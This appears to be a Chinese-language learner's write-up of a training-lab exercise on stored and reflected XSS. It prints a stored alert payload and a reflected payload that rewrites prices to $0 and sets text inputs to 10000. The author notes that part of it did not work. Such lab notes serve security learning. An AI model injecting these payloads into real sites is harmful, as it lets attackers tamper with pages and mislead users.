1、存储型
脚本:><script>alert('just for fun')</script>
------------------------------------------------------------------------------------------------------------------------------------------------------------
2、反射型
题意:通过反射型XSS,修改页面数据来达到攻击的目的。
(有点难度,参考答案做的。。。)
代码如下
'><script> alert('This kinda is called reflected XSS or First-Order XSS!'); for(i=0;i<=document.getElementsByTagName("td").length-1;i++) { if(document.getElementsByTagName("td")[i].innerHTML.indexOf('$')>0) { document.getElementsByTagName("td")[i].innerHTML = '$0';<!--找到$符号,将$符号后面的值都替换为0--> } }; for(i=0;i<=document.getElementsByTagName("input").length-1;i++) { if(document.getElementsByTagName("input")[i].type=='text') { document.getElementsByTagName("input")[i].value='10000';<!--找到文本域(text),将文本域里的值都替换为10000--> } }; </script>
效果:
第一个篡改,修改$后值为0,不知道为什么没有生效。。。原因还不晓得。。。。
------------------------------------------------------------------------------------------------------------------------------------------------------------